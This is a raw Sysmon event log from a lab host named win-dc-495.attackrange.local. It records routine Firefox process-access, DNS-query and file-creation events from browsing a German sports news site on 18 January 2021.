Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.423{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.420{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.419{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.419{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.419{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.419{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.418{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.827{59A5CD1D-945A-6005-3305-00000000A301}7052dydcfpm9yz2h5.cloudfront.net02600:9000:21a1:9000:0:b7af:5240:93a1;2600:9000:21a1:9600:0:b7af:5240:93a1;2600:9000:21a1:c400:0:b7af:5240:93a1;2600:9000:21a1:d800:0:b7af:5240:93a1;2600:9000:21a1:1200:0:b7af:5240:93a1;2600:9000:21a1:2c00:0:b7af:5240:93a1;2600:9000:21a1:7e00:0:b7af:5240:93a1;2600:9000:21a1:8000:0:b7af:5240:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:44.823{59A5CD1D-945A-6005-3305-00000000A301}7052dydcfpm9yz2h5.cloudfront.net052.222.177.12;52.222.177.43;52.222.177.48;52.222.177.84;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.823{59A5CD1D-945A-6005-3305-00000000A301}70521376624012.rsc.cdn77.org02a02:6ea0:c700::2;2a02:6ea0:c700::3;2a02:6ea0:c700::4;2a02:6ea0:c700::1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.823{59A5CD1D-945A-6005-3305-00000000A301}7052dff73782crntp.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.820{59A5CD1D-945A-6005-3305-00000000A301}7052static.kicker.de0type: 5 dydcfpm9yz2h5.cloudfront.net;::ffff:52.222.177.84;::ffff:52.222.177.12;::ffff:52.222.177.43;::ffff:52.222.177.48;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.819{59A5CD1D-945A-6005-3305-00000000A301}70521376624012.rsc.cdn77.org0195.181.175.49;195.181.175.51;195.181.175.54;195.181.175.45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.818{59A5CD1D-945A-6005-3305-00000000A301}7052dff73782crntp.cloudfront.net099.86.7.34;99.86.7.48;99.86.7.7;99.86.7.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.818{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.consentmanager.mgr.consensu.org0type: 5 1376624012.rsc.cdn77.org;::ffff:195.181.175.45;::ffff:195.181.175.49;::ffff:195.181.175.51;::ffff:195.181.175.54;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.818{59A5CD1D-945A-6005-3305-00000000A301}7052derivates.kicker.de0type: 5 dff73782crntp.cloudfront.net;::ffff:99.86.7.29;::ffff:99.86.7.34;::ffff:99.86.7.48;::ffff:99.86.7.7;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.816{59A5CD1D-945A-6005-3305-00000000A301}7052static.apester.com035.190.72.53;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.816{59A5CD1D-945A-6005-3305-00000000A301}7052static.apester.com0::ffff:35.190.72.53;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.724{59A5CD1D-945A-6005-3305-00000000A301}7052dkmnl856gd5un.cloudfront.net02600:9000:20eb:d000:16:7865:b7c0:93a1;2600:9000:20eb:fc00:16:7865:b7c0:93a1;2600:9000:20eb:1800:16:7865:b7c0:93a1;2600:9000:20eb:3e00:16:7865:b7c0:93a1;2600:9000:20eb:4600:16:7865:b7c0:93a1;2600:9000:20eb:4c00:16:7865:b7c0:93a1;2600:9000:20eb:5a00:16:7865:b7c0:93a1;2600:9000:20eb:be00:16:7865:b7c0:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.714{59A5CD1D-945A-6005-3305-00000000A301}7052dkmnl856gd5un.cloudfront.net0143.204.215.96;143.204.215.98;143.204.215.109;143.204.215.126;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.713{59A5CD1D-945A-6005-3305-00000000A301}7052www.kicker.de0type: 5 dkmnl856gd5un.cloudfront.net;::ffff:143.204.215.126;::ffff:143.204.215.96;::ffff:143.204.215.98;::ffff:143.204.215.109;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:43.393{59A5CD1D-8E56-6005-2E00-00000000A301}2464210.84.225.13.in-addr.arpa.0type: 12 server-13-225-84-210.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:43.391{59A5CD1D-8E56-6005-2E00-00000000A301}246440.100.215.91.in-addr.arpa.0type: 12 de4.ioam.de;C:\Windows\sysmon64.exe 10341000x800000000000000017930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.321{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.317{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.317{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.316{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.316{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.315{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.292{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program 
Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.291{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla 
Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.470{59A5CD1D-948E-6005-4105-00000000A301}38042532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000018031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.429{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\serviceworker-1.txt2021-01-18 14:00:46.429 11241100x800000000000000018030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.429{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\serviceworker-1.txt2021-01-18 14:00:46.429 10341000x800000000000000018029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.381{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.381{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program 
Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.380{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla 
